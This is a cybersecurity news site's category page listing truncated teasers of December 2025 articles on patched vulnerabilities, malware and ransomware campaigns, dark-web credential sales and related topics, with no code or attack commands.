Red Hot Cyber
Cybersecurity is about sharing. Recognize the risk, combat it, share your experiences, and encourage others to do better than you.
Search
Banner Ransomfeed 320x100 1
Banner Desktop

Category: Cybercrime and Darknet

Critical Windows PowerShell Vulnerability CVE-2025-54100: Update Now

Redazione RHC 12/12/2025

An urgent security update has been released to address a critical vulnerability in Windows PowerShell that allows attackers to execute malicious code on affected systems. This security flaw, designated CVE-2025-54100, was disclosed on December 9, 2025, and poses a significant threat to the integrity of computer systems globally. Microsoft classifies the vulnerability as important, with a CVSS severity score of 7.8. The weakness, identified as CWE-77, involves the improper neutralization of special elements used in command injection attacks. Microsoft considers the possibility of this vulnerability being exploited in real-world attacks to be remote. The vulnerability has already been publicly disclosed. Attackers require

Telegram Losing Ground to Crackdown on Cybercrime Activities

Redazione RHC 12/12/2025

Telegram, which over the course of its history has become one of the most popular messaging apps in the world, is gradually losing its status as a convenient platform for cybercriminals. Kaspersky Lab analysts have monitored the lifecycle of hundreds of underground channels and concluded that stricter moderation is literally excluding the underground from the messaging app. Experts point out that Telegram is inferior to dedicated secure messaging apps in terms of privacy protection: chats do not use end-to-end encryption by default, the entire infrastructure is centralized, and the server code is closed. While this probably won’t pose a significant problem for

Notepad++ Vulnerability Fixed: Update to 8.8.9 to Avoid Malware

Redazione RHC 11/12/2025

Notepad++ is often targeted by attackers because the software is popular and widely used. A recently discovered vulnerability in the open-source text and code editor Notepad++ could allow attackers to hijack network traffic, hijack the update process, and install malware on affected computers . This flaw has now been fixed in Notepad++ version 8.8.9. Users running older versions should immediately run a thorough scan with reputable security software. Their systems may already be compromised; in more severe cases, a complete reinstallation may be the only reliable solution. According to the developers, the Notepad++ update utility, WinGUp, could, under certain circumstances , be

NetSupport RAT Malware Campaign Uncovered: Expert Analysis

Redazione RHC 11/12/2025

Securonix specialists have discovered a multi-layered malware campaign aimed at secretly installing the NetSupport RAT remote access tool . The attack involves a series of carefully hidden stages, each designed to ensure maximum stealth and leave minimal traces on the compromised device. The initial download of the malicious code begins with a JavaScript file injected into the hacked websites. This script has a complex structure and hidden logic that is activated only when certain conditions are met. It can detect the user’s device type and even record whether it’s their first visit to the page, allowing it to perform malicious actions only

Digital Stress: How to Achieve Balance in a Hyper-Connected World

Daniela Farina 11/12/2025

We live in dissociation: we praise work-life balance, yet we find ourselves constantly online, like puppets on invisible strings. The real problem is not technology, but how we, humans, respond to it. What we call digital stress isn’t just an annoyance; it’s a profound crisis that affects our well-being, our identity, and our awareness. Digital Stress: The Core of the Problem Let’s explore each aspect to better understand how it works Physiological Level When we receive a notification on our device, our fight-or-flight response is activated. This constant attentional switching causes a chronic increase in cortisol , the stress hormone, as evidenced

DeadLock Ransomware Exploits Baidu Antivirus Vulnerability for EDR Bypass

Redazione RHC 11/12/2025

Cisco Talos has identified a new ransomware campaign called DeadLock : attackers are exploiting a vulnerable Baidu antivirus driver (CVE-2024-51324) to disable EDR systems using the Bring Your Own Vulnerable Driver (BYOVD) technique. The group does not operate a data leak site but communicates with victims via Session Messenger. According to Talos, the attacks are carried out by a financially motivated operator who gains access to the victim’s infrastructure at least five days before encryption and gradually prepares the system for DeadLock implementation. One of the key elements of the chain is BYOVD : the attackers themselves inject a legitimate but vulnerable

VPN Credentials on the Dark Web: A Growing Cybersecurity Threat

Redazione RHC 11/12/2025

In the darkest corners of the internet, the trafficking of stolen data and unauthorized access continues to thrive. A recent post on a closed underground forum shows 896 FortiSSL VPN credentials , complete with IP address and clear text credentials, being sold for a combined price of $3,000 . The post in the underground and the latent threat The ad, posted by a user, lists available logins for several countries, including the United States, Germany, Austria, Singapore, Japan, South Korea, Italy, the United Arab Emirates, Brazil, Switzerland, and France . The details are provided in the traditional ip:port user:password format, easily usable

Uncovering Russia’s Cyber Operations: CISM’s Role in DDoS Attacks

Redazione RHC 11/12/2025

What we wrote in the article ” Patriotic Code: from DDoSia and NoName057(16) to CISM, the algorithm that shapes youth for Putin ” on Red Hot Cyber on July 23rd is now fully consistent with the information made public by the United States Department of Justice . Back in July we described how DDoSia worked and the role of NoName057(16) in recruiting volunteers for DDoS attacks via Telegram, highlighting how behind what appeared to be an activity of ” patriotic cyber-volunteering ” there was a centralized coordination and infrastructure attributable to figures linked to the CISM , a pro-Russian government body. Today’s

Microsoft Outlook RCE Vulnerability: Update Now to Prevent Attacks

Redazione RHC 11/12/2025

A critical remote code execution (RCE) vulnerability in Outlook has been patched by Microsoft, potentially allowing attackers to run malicious code on vulnerable systems. The vulnerability, tracked under CVE-2025-62562, stems from a use-after-free vulnerability in Microsoft Office Outlook and has a CVSS severity of 7.8. The exploit is triggered locally, requiring the attacker to trick a user into interacting with a malicious email. Once this is done, the attacker convinces the user to respond to a spoofed email, triggering the code execution chain . A vulnerability that requires user interaction According to Microsoft , it is critical that organizations prioritize installing available

Google Chrome Urgent Update Fixes Zero-Day Vulnerability

Redazione RHC 11/12/2025

An urgent update has been released by Google for the stable version of the Desktop browser, in order to address an extremely serious vulnerability that is currently being exploited. This update , which brings the browser to version 143.0.7499.109/.110, fixes three security vulnerabilities, including a zero-day flaw flagged as 466192044. Google, unusually, has kept the details of its CVE identifier under wraps, simply listing it as “Coordinating.” Google also fixed two other medium-severity vulnerabilities reported by external security experts. For these, a total of $4,000 was awarded under the bug bounty program . They are: Returning to the previous vulnerability without a

Category